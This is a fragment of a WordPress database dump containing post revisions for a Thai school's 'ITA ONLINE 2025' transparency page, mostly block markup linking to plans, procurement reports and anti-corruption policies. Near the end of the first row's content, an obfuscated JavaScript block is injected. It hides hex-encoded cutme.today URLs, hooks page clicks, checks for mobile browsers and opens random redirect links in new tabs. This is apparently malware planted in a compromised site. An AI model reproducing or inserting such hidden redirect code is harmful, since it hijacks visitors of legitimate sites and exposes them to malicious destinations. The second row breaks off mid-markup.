{\"uniqueID\":\"871_77fcfe-f3\",\"width\":4,\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_77fcfe-f3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_e9af1d-e0\",\"size\":16,\"width\":4,\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_e9af1d-e0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\">ข่าวประชาสัมพันธ์</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"e71bc9-b1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tabe71bc9-b1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_8bd340-cd\",\"color\":\"#0693e3\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_8bd340-cd kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_eb7e47-e1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_eb7e47-e1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_cdf90d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_cdf90d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_da22bc-41\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_da22bc-41\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\">คู่มือหรือแนวทางปฏิบัติงานของครู และบุคลากรทางการศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_006068-f2\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_006068-f2\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลเชิงสถิติการให้บริการ</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_b2d0c3-79\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_b2d0c3-79\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":3,\"uniqueID\":\"bab0c3-88\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-3 kt-inner-tabbab0c3-88\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_948636-84\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_948636-84 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_3edff3-bb\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_3edff3-bb\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_9ab5d8-54\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_9ab5d8-54\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี งบประมาณ พ.ศ .2567</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":4,\"uniqueID\":\"942a96-06\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-4 kt-inner-tab942a96-06\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_37f8e2-2d\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_37f8e2-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_12bed0-a6\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_12bed0-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_7e4f7d-a0\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_7e4f7d-a0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"1003\">ประมวลจริยธรรม และการขับเคลื่อนจริยธรรม</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":5,\"uniqueID\":\"42916d-7b\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-5 kt-inner-tab42916d-7b\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_25468b-f6\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_25468b-f6 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_ae038f-10\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_ae038f-10\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_667e50-fd\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_667e50-fd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":6,\"uniqueID\":\"357ff8-b0\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-6 kt-inner-tab357ff8-b0\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_363bba-05\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_363bba-05 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_c0e085-63\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_c0e085-63\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์และการสร้างวัฒนธรรม ตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_29fead-8e\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_29fead-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1032\">การประเมินความเสี่ยงที่อาจเกิดการให้หรือรับสินบนจากการดำเนินงานตามภารกิจของสถานศึกษา  ประจำปีงบประมาณ พ.ศ .2568</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":7,\"uniqueID\":\"77d9b7-d1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-7 kt-inner-tab77d9b7-d1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_c6c267-89\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_c6c267-89 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_64d6b5-67\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_64d6b5-67\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1010\" data-type=\"page\" data-id=\"1010\">แนวทาง/โครงการ/กิจกรรมการป้องกันการทุจริต</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_106c4d-48\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_106c4d-48\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n<!-- /wp:generateblocks/container -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','ITA ONLINE 2025','','inherit','closed','closed','','871-revision-v1','','','2025-06-27 11:55:01','2025-06-27 04:55:01','',871,'http://pakhaeng.ssk.in.th/?p=1485',0,'revision','',0),
(1486,1,'2025-06-27 11:55:56','2025-06-27 04:55:56','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_1540af-66\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsscho